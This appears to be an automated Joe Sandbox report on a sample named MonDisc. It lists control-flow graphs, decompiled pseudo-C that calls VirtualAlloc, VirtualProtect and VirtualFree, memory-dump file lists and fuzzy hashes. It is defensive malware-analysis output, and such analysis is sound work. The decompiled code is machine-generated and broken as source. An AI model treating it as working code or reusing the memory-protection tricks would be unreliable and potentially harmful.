                              control_flow_graph 6724 7ff62c93b4f0-7ff62c93b503 6725 7ff62c93b57e-7ff62c93b588 6724->6725 6726 7ff62c93b505-7ff62c93b50f 6724->6726 6729 7ff62c93b58a-7ff62c93b598 6725->6729 6730 7ff62c93b5d3-7ff62c93b5d9 6725->6730 6727 7ff62c93b551-7ff62c93b56b VirtualProtect 6726->6727 6728 7ff62c93b511-7ff62c93b518 6726->6728 6733 7ff62c93b571-7ff62c93b57d 6727->6733 6734 7ff62c93b600-7ff62c93b608 call 7ff62c93b9d0 6727->6734 6732 7ff62c93b51a-7ff62c93b534 VirtualProtect 6728->6732 6728->6733 6729->6730 6735 7ff62c93b59a-7ff62c93b5a1 6729->6735 6730->6730 6731 7ff62c93b5db-7ff62c93b5e6 6730->6731 6731->6730 6736 7ff62c93b5e8-7ff62c93b5fe VirtualProtect 6731->6736 6732->6734 6738 7ff62c93b53a-7ff62c93b550 6732->6738 6739 7ff62c93b5c5-7ff62c93b5d2 6735->6739 6740 7ff62c93b5a3-7ff62c93b5b9 VirtualProtect 6735->6740 6736->6734 6736->6739 6740->6734 6741 7ff62c93b5bb 6740->6741 6741->6739
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ProtectVirtual
                              • String ID:
                              • API String ID: 544645111-0
                              • Opcode ID: e4865afb915496471d6bbcdb1aef419896af53439b49253e0173317b4e702b01
                              • Instruction ID: 0d8cc644f4d458320fa0c555a007c9d90534fc4d1b70c6243e90ab8fc1409a19
                              • Opcode Fuzzy Hash: e4865afb915496471d6bbcdb1aef419896af53439b49253e0173317b4e702b01
                              • Instruction Fuzzy Hash: 45218F62F1C98681EF54DF26E8447E92360FB04B98F480036CB0D87656DF79D994C701
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C914AC0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 6743 7ff62c914ac0-7ff62c914ad0 6744 7ff62c914ad6-7ff62c914ae0 6743->6744 6745 7ff62c914b79-7ff62c914b7e 6743->6745 6746 7ff62c914ae5-7ff62c914afb GetLastError 6744->6746 6747 7ff62c914b59-7ff62c914b5b SetLastError 6746->6747 6748 7ff62c914afd 6746->6748 6749 7ff62c914b61-7ff62c914b64 6747->6749 6750 7ff62c914b00-7ff62c914b17 VirtualQuery 6748->6750 6749->6746 6751 7ff62c914b6a-7ff62c914b74 6749->6751 6750->6749 6752 7ff62c914b19-7ff62c914b1e 6750->6752 6751->6745 6752->6749 6753 7ff62c914b20-7ff62c914b25 6752->6753 6753->6749 6754 7ff62c914b27-7ff62c914b2f 6753->6754 6754->6749 6755 7ff62c914b31-7ff62c914b36 6754->6755 6755->6749 6756 7ff62c914b38-7ff62c914b4b VirtualFree 6755->6756 6756->6749 6757 7ff62c914b4d-7ff62c914b57 6756->6757 6757->6747 6757->6750
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ErrorLastVirtual$FreeQuery
                              • String ID:
                              • API String ID: 2187276999-0
                              • Opcode ID: 20c87b9970e1333da46833e6f9bdc2643c7eabd298e1a4bb3600f4f4c70c1e47
                              • Instruction ID: 03c873749e82fd4813b673589fe114e3785e648865514e48ee6eddcc99b3694b
                              • Opcode Fuzzy Hash: 20c87b9970e1333da46833e6f9bdc2643c7eabd298e1a4bb3600f4f4c70c1e47
                              • Instruction Fuzzy Hash: 58116D31E48B8182EF619F15B80132DB3A8FB89BA1F480035EA8D97B59CF7CE541CB01
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C901990 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 137COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ContextEntryFunctionLookup$CaptureRestoreUnwindVirtual
                              • String ID: CCG $csm
                              • API String ID: 3115360832-2763669848
                              • Opcode ID: e1f5c2b70966fd4569ac91c2244ea77c1fdfe1cb53358e8faaeeadb4bbb39fb4
                              • Instruction ID: ffe2a00263b1d474027954ae1cabb6c005b3f42586d3212f8becede02d996e0a
                              • Opcode Fuzzy Hash: e1f5c2b70966fd4569ac91c2244ea77c1fdfe1cb53358e8faaeeadb4bbb39fb4
                              • Instruction Fuzzy Hash: ED41DE22F08B4582EE249B16EC0537A67A1FB44FF4F544132EE5D87BAADE3CE4418742
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C914990 Relevance: 3.8, APIs: 3, Instructions: 73memoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 58%
                              			E00007FF67FF62C914990(void* __esi, signed long long __rax, long long __rbx, void* __rcx, long long __rsi) {
				void* _t23;
				void* _t24;
				signed int _t25;
				signed long long _t46;
				signed long long _t47;
				void* _t49;
				void* _t56;
				void* _t58;
				long long _t59;
				long _t60;
				void* _t62;
				long long _t71;
				void* _t73;
				void* _t75;
				void* _t76;
				void* _t78;

				_t49 = __rcx;
				 *((long long*)(_t75 + 0x18)) = __rbx;
				_t76 = _t75 - 0x20;
				GetLastError();
				r8d = 0x3000;
				_t2 = _t49 + 4; // 0x4, executed
				r9d = _t2;
				_t23 = VirtualAlloc(??, ??, ??, ??); // executed
				_t46 = __rax;
				SetLastError(_t60);
				_t62 =  !=  ? __rax : 0xffffffff;
				if (0xffffffff == 0xffffffff) goto 0x2c914aa7;
				 *((long long*)(_t76 + 0x30)) = _t71;
				 *((long long*)(_t76 + 0x38)) = __rsi;
				if (0xffffffff != 0xffffffff) goto 0x2c9149f4;
				goto 0x2c9149fa;
				_t5 = _t62 + 0x10; // 0x10000000f
				_t73 = _t5 + 0xffffffff;
				r8d = 0x370;
				_t24 = E00007FF67FF62C974DE0(_t23, 0, _t73, _t56, _t78);
				 *0x00BADBB4 = 0x373;
				 *((long long*)(_t73 + 0x348)) = 0xffffffff;
				 *((long long*)(_t73 + 0x350)) = 0x20000;
				 *((long long*)(_t73 + 0x30)) = 0xff;
				_t25 = E00007FF67FF62C914770(_t24, _t73);
				_t12 = _t73 - 0x10; // 0xffffffff
				_t58 = _t12 + ( *(_t73 - 8) & 0xfffffffc);
				if (0xffffffff == 0xffffffff) goto 0x2c914a6a;
				_t47 =  ~_t46;
				_t59 = _t58 + _t47;
				 *((long long*)(_t73 + 0x20)) = _t59;
				 *((long long*)(_t73 + 0x10)) = 0xffffffff;
				 *((long long*)(_t59 + 8)) = 0xffffffffffffffff;
				 *((long long*)(_t59 + _t62 - _t58 + 0x1ffc0 - _t47 + 8)) = 0x40;
				 *((long long*)(_t73 + 0x28)) = 0x200000;
				return _t25 & 0x00000007;
			}



















                              0x7ff62c914990
                              0x7ff62c914990
                              0x7ff62c914996
                              0x7ff62c91499a
                              0x7ff62c9149a7
                              0x7ff62c9149af
                              0x7ff62c9149af
                              0x7ff62c9149b3
                              0x7ff62c9149bb
                              0x7ff62c9149be
                              0x7ff62c9149ce
                              0x7ff62c9149d6
                              0x7ff62c9149dc
                              0x7ff62c9149e3
                              0x7ff62c9149ee
                              0x7ff62c9149f2
                              0x7ff62c9149fa
                              0x7ff62c914a00
                              0x7ff62c914a03
                              0x7ff62c914a0c
                              0x7ff62c914a11
                              0x7ff62c914a1d
                              0x7ff62c914a24
                              0x7ff62c914a2f
                              0x7ff62c914a37
                              0x7ff62c914a40
                              0x7ff62c914a4d
                              0x7ff62c914a60
                              0x7ff62c914a64
                              0x7ff62c914a6d
                              0x7ff62c914a70
                              0x7ff62c914a77
                              0x7ff62c914a82
                              0x7ff62c914a86
                              0x7ff62c914a8f
                              0x7ff62c914aa6

                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ErrorLast$AllocVirtual
                              • String ID:
                              • API String ID: 1225938287-0
                              • Opcode ID: f9c01e8079d133bec8a0bf8e62291096fc8cae84ce67d04018067ad811153b0a
                              • Instruction ID: c175c5e3c6a898471cc0f5b104a3f4c4e37390bca64c5593f9fd4b382e3d1c30
                              • Opcode Fuzzy Hash: f9c01e8079d133bec8a0bf8e62291096fc8cae84ce67d04018067ad811153b0a
                              • Instruction Fuzzy Hash: 3721C072F14A8086EB148F25ED8436972A5EB49BB8F584334DA7D4BADACF3CD5458300
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C93B310 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34memoryCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ProtectVirtual
                              • String ID:
                              • API String ID: 544645111-3916222277
                              • Opcode ID: dc9e0bc24b8a14b25f42cd3fce6812904afc7f3a83e5f824c8b073630af0a366
                              • Instruction ID: 7aec3f18a195a2b40e727c9c8446921766dd0cca911e7c1735d3c8251c9f1dcf
                              • Opcode Fuzzy Hash: dc9e0bc24b8a14b25f42cd3fce6812904afc7f3a83e5f824c8b073630af0a366
                              • Instruction Fuzzy Hash: 36E0ED61E1A59681FF589F62D8587F82250EB54B58F0C1036D91D8B686CF38D5858711
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C93B370 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31memoryCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ProtectVirtual
                              • String ID:
                              • API String ID: 544645111-3916222277
                              • Opcode ID: bd5762d522cc1c6c6a376013eaf042b8cddcb8530fa961075b392e24916f12f7
                              • Instruction ID: 911960bf5f3841d46f036ad3088780c6cb09b86980ab0f570b5e04740f628160
                              • Opcode Fuzzy Hash: bd5762d522cc1c6c6a376013eaf042b8cddcb8530fa961075b392e24916f12f7
                              • Instruction Fuzzy Hash: 68E09261E1A68681EF14DB62E8587EC3390EB14B5CF1C0036DA1C4B752CF39C0828701
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8FF020 Relevance: 2.6, APIs: 2, Instructions: 129COMMON
                              Download Yara Rule
                              C-Code - Quality: 75%
                              			E00007FF67FF62C8FF020(void* __edi, intOrPtr* __rax, signed long long __rcx, signed int __rdx, long long __rdi, long long __rsi, long long __r14, long long __r15) {
				void* _t60;
				signed int _t65;
				void* _t76;
				intOrPtr* _t109;
				signed long long _t111;
				signed long long _t114;
				intOrPtr _t115;
				long long _t125;
				void* _t131;
				long long _t139;
				signed long long _t141;
				void* _t143;
				void* _t145;
				intOrPtr _t148;

				 *((long long*)(_t143 + 0x50)) = _t139;
				_t111 = __rcx;
				 *((long long*)(_t143 + 0x58)) = __rsi;
				 *((long long*)(_t143 + 0x60)) = __rdi;
				 *((long long*)(_t143 + 0x28)) = __r14;
				 *((long long*)(_t143 + 0x20)) = __r15;
				E00007FF67FF62C984D84(__rax);
				r12d =  *__rax;
				r13d = GetLastError();
				_t148 =  *((intOrPtr*)(__rcx + 0x10));
				_t114 =  *( *((intOrPtr*)(__rcx + 0x20)) - 0x10) & 0xffffffff;
				_t145 = _t148 + 0x2d8;
				if ( *((char*)(_t114 + 0xa)) != 0) goto 0x2c8ff0ca;
				_t115 =  *((intOrPtr*)(_t114 + 0x20));
				if (( *(_t115 - 0x2b) & 0x00000002) == 0) goto 0x2c8ff0a4;
				if ( *((intOrPtr*)(__rcx + 0x30)) -  *(__rcx + 0x28) -  *(__rcx + 0x28) << 3 > 0) goto 0x2c8ff0be;
				E00007FF67FF62C8FB470(( *(_t115 - 0x5d) & 0x000000ff) + 1 + __edi, __rcx);
				_t76 =  >=  ? ( *(_t115 - 0x5e) & 0x000000ff) - __edi : 0;
				goto 0x2c8ff0e9;
				if ( *((intOrPtr*)(_t111 + 0x30)) -  *((intOrPtr*)(_t111 + 0x28)) - 0xa0 > 0) goto 0x2c8ff0e7;
				E00007FF67FF62C8FB470(0x14, _t111);
				 *(_t145 + 0x80) = _t111;
				if ((bpl & 0x00000001) == 0) goto 0x2c8ff111;
				_t141 = __rdx & 0xfffffffe;
				0x2c910630();
				goto 0x2c8ff1a6;
				if ( *((intOrPtr*)(_t145 + 0xec)) == 0) goto 0x2c8ff131;
				if (( *(_t148 + 0x91) & 0x00000060) != 0) goto 0x2c8ff131;
				_t131 = _t141 - 4;
				_t60 = E00007FF67FF62C910750(_t145, _t131); // executed
				if (( *(_t148 + 0x91) & 0x00000001) == 0) goto 0x2c8ff1a6;
				if (0 <= 0) goto 0x2c8ff166;
				 *((long long*)( *((intOrPtr*)(_t111 + 0x28)))) = 0xffffffff;
				 *((long long*)(_t111 + 0x28)) =  *((long long*)(_t111 + 0x28)) + 8;
				if (0 != 0) goto 0x2c8ff150;
				_t37 = _t131 - 1; // -1
				r8d = _t37;
				E00007FF67FF62C8FEEA0(_t60, 0, _t111);
				if (0 <= 0) goto 0x2c8ff1a6;
				_t125 =  *((intOrPtr*)(_t111 + 0x28)) + 0xfffffff8;
				if ( *_t125 != 0xffffffff) goto 0x2c8ff1a6;
				 *((long long*)(_t111 + 0x28)) = _t125;
				_t109 = _t145 + 0xec;
				if (0xffffffffffffffff > 0) goto 0x2c8ff180;
				_t65 =  *(_t141 - 4) & 0x000000ff;
				if (( *(_t145 + 0xa8) & 0x00000001) == 0) goto 0x2c8ff1d4;
				if ( *_t109 == 0) goto 0x2c8ff1e0;
				if (_t65 == 0x59) goto 0x2c8ff1de;
				if (_t65 != 0x5c) goto 0x2c8ff1e0;
				E00007FF67FF62C984D84(_t109);
				 *_t109 = r12d;
				SetLastError(??);
				return  *(0x2ca0b8a0 + _t111 * 2) & 0x0000ffff;
			}

















                              0x7ff62c8ff02a
                              0x7ff62c8ff02f
                              0x7ff62c8ff032
                              0x7ff62c8ff03a
                              0x7ff62c8ff03f
                              0x7ff62c8ff044
                              0x7ff62c8ff049
                              0x7ff62c8ff04e
                              0x7ff62c8ff05b
                              0x7ff62c8ff05e
                              0x7ff62c8ff070
                              0x7ff62c8ff073
                              0x7ff62c8ff07e
                              0x7ff62c8ff080
                              0x7ff62c8ff09e
                              0x7ff62c8ff0b4
                              0x7ff62c8ff0b9
                              0x7ff62c8ff0c5
                              0x7ff62c8ff0c8
                              0x7ff62c8ff0d8
                              0x7ff62c8ff0e2
                              0x7ff62c8ff0e9
                              0x7ff62c8ff0f4
                              0x7ff62c8ff0f6
                              0x7ff62c8ff100
                              0x7ff62c8ff10c
                              0x7ff62c8ff119
                              0x7ff62c8ff123
                              0x7ff62c8ff125
                              0x7ff62c8ff12c
                              0x7ff62c8ff140
                              0x7ff62c8ff144
                              0x7ff62c8ff154
                              0x7ff62c8ff15b
                              0x7ff62c8ff164
                              0x7ff62c8ff16b
                              0x7ff62c8ff16b
                              0x7ff62c8ff16f
                              0x7ff62c8ff17d
                              0x7ff62c8ff18b
                              0x7ff62c8ff195
                              0x7ff62c8ff197
                              0x7ff62c8ff19b
                              0x7ff62c8ff1a4
                              0x7ff62c8ff1ca
                              0x7ff62c8ff1cd
                              0x7ff62c8ff1d2
                              0x7ff62c8ff1d7
                              0x7ff62c8ff1dc
                              0x7ff62c8ff1e0
                              0x7ff62c8ff1e8
                              0x7ff62c8ff1eb
                              0x7ff62c8ff20f

                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ErrorLast
                              • String ID:
                              • API String ID: 1452528299-0
                              • Opcode ID: e80b2bc9db974d49542e4d1372fe8b582b24f3e5b18ddff23404600a2fe7202b
                              • Instruction ID: 6377bbac4fb2feea6185983420b7a21036aba470e4217bb156411cb714e5462a
                              • Opcode Fuzzy Hash: e80b2bc9db974d49542e4d1372fe8b582b24f3e5b18ddff23404600a2fe7202b
                              • Instruction Fuzzy Hash: 15517F32A08A8189EB11CB29D84477967A4FB84BB8F958332DE6D833D5DF3ED845C701
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C93B7F0 Relevance: 2.6, APIs: 2, Instructions: 97memoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 46%
                              			E00007FF67FF62C93B7F0(long long* __rax, long long __rbx, void* __rcx, long long __rsi) {
				int _t24;
				signed int _t25;
				void* _t27;
				long long* _t37;
				signed long long _t45;
				void* _t63;
				long long _t68;
				void* _t72;
				long long* _t75;
				long _t76;
				void* _t78;
				long long _t79;

				_t37 = __rax;
				 *((long long*)(_t72 + 0x10)) = __rbx;
				 *((long long*)(_t72 + 0x18)) = _t68;
				 *((long long*)(_t72 + 0x20)) = __rsi;
				_t79 =  *((intOrPtr*)(__rcx + 0xbe8));
				_t45 =  *((intOrPtr*)(__rcx + 0x694)) + 0x00000003 << 0x0000000a & 0xfffff000;
				r14d = 0;
				_t50 =  ==  ? _t76 : _t79 - _t45;
				_t30 =  ==  ? _t76 : _t79 - _t45;
				if (( ==  ? _t76 : _t79 - _t45) == 0) goto 0x2c93b8a0;
				r9d = 4;
				r8d = 0x103000;
				VirtualAlloc(_t78, _t76); // executed
				_t75 = __rax;
				if (__rax == 0) goto 0x2c93b8a0;
				if (__rax - 0x7ff62c8f4bb6 + _t45 - 0x3fe00000 < 0) goto 0x2c93b8d6;
				if (0x7ff62c8f4bb6 - __rax - 0x3fe00000 < 0) goto 0x2c93b8d6;
				r8d = 0x8000;
				_t24 = VirtualFree(_t63, ??);
				asm("o16 nop [eax+eax]");
				_t25 = E00007FF67FF62C912230(_t24, _t27, __rcx - 0x150);
				if (_t37 + _t45 - 0x7fc00000 >= 0) goto 0x2c93b8a0;
				r14d = r14d + 1;
				if (r14d - 0x1f >= 0) goto 0x2c93b934;
				goto 0x2c93b846;
				 *((long long*)(__rcx + 0xbe8)) = _t75;
				 *((long long*)(__rcx + 0xbf0)) = _t37 + _t45;
				_t14 = _t75 + 0x10; // 0x10
				 *(__rcx + 0xc00) = _t45;
				 *((long long*)(__rcx + 0xbf8)) = _t14;
				 *((intOrPtr*)(__rcx + 0xbe4)) = 4;
				 *_t75 = _t79;
				 *( *((intOrPtr*)(__rcx + 0xbe8)) + 8) = _t45;
				 *((intOrPtr*)(__rcx + 0xc08)) =  *((intOrPtr*)(__rcx + 0xc08)) + _t45;
				return _t25 & 0x7fff0000;
			}















                              0x7ff62c93b7f0
                              0x7ff62c93b7f0
                              0x7ff62c93b7f5
                              0x7ff62c93b7fa
                              0x7ff62c93b816
                              0x7ff62c93b828
                              0x7ff62c93b82f
                              0x7ff62c93b842
                              0x7ff62c93b846
                              0x7ff62c93b849
                              0x7ff62c93b84b
                              0x7ff62c93b851
                              0x7ff62c93b85a
                              0x7ff62c93b860
                              0x7ff62c93b866
                              0x7ff62c93b878
                              0x7ff62c93b887
                              0x7ff62c93b88b
                              0x7ff62c93b894
                              0x7ff62c93b89a
                              0x7ff62c93b8a7
                              0x7ff62c93b8bc
                              0x7ff62c93b8c5
                              0x7ff62c93b8cf
                              0x7ff62c93b8d1
                              0x7ff62c93b8e5
                              0x7ff62c93b8ec
                              0x7ff62c93b8f3
                              0x7ff62c93b8f7
                              0x7ff62c93b8fe
                              0x7ff62c93b901
                              0x7ff62c93b90b
                              0x7ff62c93b915
                              0x7ff62c93b919
                              0x7ff62c93b933

                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: 0f7646565ba74cff3643f04de9dfd9104d266136aced4bd7108743d174fba979
                              • Instruction ID: 49213d4773f531b0bd14cfebaf175c4abf7a3543b1691214cf5ab5318fabaa5f
                              • Opcode Fuzzy Hash: 0f7646565ba74cff3643f04de9dfd9104d266136aced4bd7108743d174fba979
                              • Instruction Fuzzy Hash: C031C022F18A8682EE18DF21E8143BA7764FB84BA8F584631CF6E43795DF3CD1428305
                              Uniqueness

